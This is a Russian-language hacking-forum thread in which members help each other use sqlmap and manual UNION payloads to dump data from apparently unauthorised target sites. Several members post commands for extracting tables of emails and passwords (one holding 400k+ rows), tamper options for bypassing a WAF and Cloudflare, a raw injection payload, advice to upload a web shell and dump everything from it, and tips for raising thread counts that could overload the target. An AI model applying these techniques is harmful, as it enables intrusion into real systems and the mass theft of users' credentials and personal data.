Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    тут лучше тогда сразу искать нужные данные --search -T admin и т.д --search -C pass чтобы время не тратить. И потоков побольше , если можно --threads=15!
    Может еще есть какие уязвимости, которые можно в Union или Error раскрутить
     
    _________________________
  2. Leendesst

    Leendesst New Member

    Joined:
    20 Nov 2016
    Messages:
    64
    Likes Received:
    0
    Reputations:
    0
    Есть Sql-inj. Выбивает такой error
    Code:
    Database_Exception [ 1064 ]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 [ SELECT id FROM `users` WHERE `id` = '1'' ]
    Сайт под cloudflaer'ом, его в sql-map'е обойти труда не составило, но ошибку он не видит. Пробовал и так /user/1* и так /user/*. Помогите пожйлуйста.
     
  3. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    --level 3 попробуй, и возможно ещё куки нужны --cookie
     
    _________________________
  4. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Mysql:MariaDB
    Type: AND/OR time-based blind

    Если копать сайт вручную, он блокирует запросы при выборе user(), version(), database() - вручную таблицы выводит.
    Используя sqlmap начинаются рождаться всякие птеродактили в ввиде ошибок:
    Code:
    [18:20:25] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
    [18:20:31] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
    
    и
    Code:
    [18:19:32] [ERROR] invalid character detected. retrying..
    Я голову сломал как обойти неправильную кодировку.

    пробовал так:
    Code:
    --tables --fresh-queries --time-sec=30 --no-cast --fresh-queries
    
    
    и так
    Code:
    --table - space2comment --tables --fresh-queries --time-sec=30 --fresh-queries --hex
         
    Таблицы не видит из-за неправильной кодировки. Все же, как правильно составить запрос, чтобы прочитать их?
     
  5. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Взял запрос sqlmap и попытался модифицировать
    Code:
    -6576%20UNION%20ALL%20SELECT%20CONCAT(0x716a7a7071,0x4c754378766f69486f7a7270574e796c525666716c766b61524c435a644a4565566d73534a424348,0x716a766b71),71,table_name%20FROM%20information_schema.tables%20WHERE%20table_schema=0x64623139353861%20--
    Выводит пустую страницу, но при запросе
    Code:
    index.php?id=-6576%20UNION%20ALL%20SELECT%20CONCAT(0x716a7a7071,0x4c754378766f69486f7a7270574e796c525666716c766b61524c435a644a4565566d73534a424348,0x716a766b71),71,user()--%20giyw%20---
    уже выдает результаты.

    Как с помощью sqlmap или уже вручную составить запрос и вывести эти таблицы
     
  6. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Крутится на 80 порту демон "DataPalm"
    sqlmap при таком запросе выдает несуразицу
    Code:
    -D BAZA -T TABLE -C password --dump --threads=10  --hex --parse-errors --cookie="cookies" --random-agent
    Вот как выдернуть данные из колонки, чтобы они не были дичью?
    [12:04:03] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0.12
    [12:04:03] [INFO] fetching entries of column(s) 'password' for table 'documents' in database ''
    [12:04:03] [INFO] fetching number of column(s) 'password' entries for table 'documents' in database ''
    [12:04:03] [INFO] resumed: 2417
    [12:04:03] [INFO] retrieving the length of query output
    [12:04:03] [INFO] retrieved:
    [12:04:04] [WARNING] reflective value(s) found and filtering out
    [12:04:08] [INFO] retrieved:
    [12:04:08] [INFO] resumed: \x08\x18
    [12:04:08] [INFO] retrieving the length of query output
    [12:04:13] [INFO] retrieved:
    [12:04:13] [INFO] resumed: \x07\xffs_a3RD
    [12:04:13] [INFO] retrieving the length of query output
    [12:04:18] [INFO] retrieved:
    [12:04:24] [INFO] retrieved:
    [12:04:24] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
    [12:04:24] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
    [12:05:10] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
    [12:05:12] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
    [12:05:15] [INFO] retrieved:
    [12:05:15] [INFO] retrieving the length of query output
    [12:05:19] [INFO] retrieved:
    [12:05:25] [INFO] retrieved:
    [12:05:28] [INFO] retrieved:
    [12:05:28] [INFO] retrieving the length of query output
    [12:05:32] [INFO] retrieved:
    [12:05:39] [INFO] retrieved:
    [12:05:45] [INFO] retrieved:
    [12:05:45] [INFO] retrieving the length of query output
    [12:05:50] [INFO] retrieved:
    [12:05:56] [INFO] retrieved:
    [12:06:00] [INFO] retrieved:
    [12:06:00] [INFO] retrieving the length of query output
    [12:06:09] [INFO] retrieved:
    [12:06:20] [INFO] retrieved:
    [12:06:25] [INFO] retrieved:
    [12:06:25] [INFO] retrieving the length of query output
    [12:06:30] [INFO] retrieved:
    [12:06:35] [INFO] retrieved:
    [12:06:39] [INFO] retrieved:
    [12:06:39] [INFO] retrieving the length of query output
    [12:06:43] [INFO] retrieved:
    [12:06:50] [INFO] retrieved:
    [12:06:54] [INFO] retrieved:
    [12:06:54] [INFO] retrieving the length of query output
    [12:06:59] [INFO] retrieved:
    [12:07:05] [INFO] retrieved:
    [12:07:09] [INFO] retrieved:
    [12:07:09] [INFO] retrieving the length of query output
    [12:07:13] [INFO] retrieved:
    [12:07:22] [INFO] retrieved:
    [12:07:26] [INFO] retrieved:
    [12:07:26] [INFO] retrieving the length of query output
    [12:07:30] [INFO] retrieved:
    [12:07:35] [INFO] retrieved:
    [12:07:39] [INFO] retrieved:
    [12:07:39] [INFO] retrieving the length of query output
    [12:07:44] [INFO] retrieved:
    [12:07:50] [INFO] retrieved:
    [12:07:55] [INFO] retrieved:
    [12:07:55] [INFO] retrieving the length of query output
    [12:08:01] [INFO] retrieved:
    [12:08:08] [INFO] retrieved:
    [12:08:13] [INFO] retrieved:
    [12:08:13] [INFO] retrieving the length of query output
    [12:08:13] [INFO] retrieved:
     
  7. johncena55

    johncena55 New Member

    Joined:
    3 Dec 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста из-за чего может быть такая проблема?

    [08:22:58] [INFO] fetching database names
    [08:22:58] [INFO] fetching number of databases
    [08:22:58] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
    [08:23:16] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
    [08:24:57] [ERROR] invalid character detected. retrying..
    [08:25:33] [ERROR] invalid character detected. retrying..
    [08:26:10] [ERROR] invalid character detected. retrying..
    [08:26:46] [ERROR] invalid character detected. retrying..
    [08:27:23] [ERROR] invalid character detected. retrying..
    [08:29:25] [ERROR] unable to properly validate last character value ('3')..
    [08:30:02] [ERROR] invalid character detected. retrying..
     
  8. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    еще часто ошибка когда у вас слабый интернет , высокий Ping (если через Wi-Fi) или что-то качается попутно, забивает траффик , тогда sqlmap не может верно расчитать время и начинает сыпать ошибки.
     
    _________________________
    panic.ker likes this.
  9. johncena55

    johncena55 New Member

    Joined:
    3 Dec 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Пробовал и то и другое...

    Интернет хороший, первый раз столкнулся с такой проблемой..
    Уже добирался до дб этого сайта, но было много ошибок, решил другой параметр пустить, теперь и тот и другой дает эти ошибки..
     
  10. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    похоже на работу waf. Попробуйте тогда --tamper= и из списка https://github.com/sqlmapproject/sqlmap/tree/master/tamper может получится обойти
     
    _________________________
  11. johncena55

    johncena55 New Member

    Joined:
    3 Dec 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Спасибо, попробую! Некоторые из них уже пробовал..Вроде их через запятую несколько можно сразу использовать или лучше по одному?
     
  12. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    через запятую да ,их комбинировать нужно ,к примеру разный регистр+замена символов и т.д
    В идеале бы найти такой линк ,где точно не ТаймБлайнд --technique=EUB
     
    _________________________
    Alexandr17 likes this.
  13. johncena55

    johncena55 New Member

    Joined:
    3 Dec 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Перебором их подбирать?

    И еще хотел спросить, дамплю таблицу..1 строка примерно 10-20 минут, когда выбираю только 2 колонки(-C email,pass) все 400к+ сливаются за секунду, но строки "NULL", хотя при дампе все таблицы видно, что они не пустые.. --hex помогало при таких случаях, но сейчас такая же скорость, как и была.
     
  14. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    тайм-блайнд это самый медленный из возможных способов и ненадежный, т.к может выдать при лаге интернета 1 неверный символ и все. Лучшим решением в такой ситуации или поиск другой скули в другом линке ,не таймблайнд ,или поиск и раскрутка данных админа( к примеру --search -T adm --search -C pass) , заливка на сайт и уже сливать с шелла все
     
    _________________________
    panic.ker and Alexandr17 like this.
  15. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    87
    Likes Received:
    69
    Reputations:
    3
    Таймблайнд это пзд. Если mysql.user не под тобой или данных админа нет-это пздц борода втройне. Только ныть или месяцами мучаться. Даже хэш админа иногда слить только с 5го раза получается, т.к. как выше гримнир отписал-малейший косяк коннекта-и пздц. Если есть такая эррорка на таргете, то есть и другие 99% из ста. Ищи, да обрящешь =)
     
  16. johncena55

    johncena55 New Member

    Joined:
    3 Dec 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0

    Решил проблему тем, что взял другую уязвимость))

    Но опять же, есть проблема со скоростью дампа
     
  17. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    87
    Likes Received:
    69
    Reputations:
    3
    Неугомонный... Дело в инете, серваке, баге? Откуда мы знаем! Если не боишься пару к на дампе потерять, зайди sqlmap/lib/core/settings.py и найди пункт MAX_NUMBER_OF_THREADS,максимум по умолчанию 10 потоков, ебани 500 чтоли. или аххулиард. Советую не более 200. И так на 5-10 впс \ вдс
     
  18. johncena55

    johncena55 New Member

    Joined:
    3 Dec 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0

    С инетом все в порядке, сам не знаю в чем проблема, с 2мя сайтами только проблемы. Сделал как ты сказал, поставил 70 для теста, ничего не поменялос
     
  19. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    87
    Likes Received:
    69
    Reputations:
    3
    Экстрасенсы в отпуске.
     
  20. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    можно ставить больше 10 потоков --threads=500! и он тогда проигнорирует 10 ,только смысла да нету от такого количества.сайт может заблочить или ддос устроит
     
    _________________________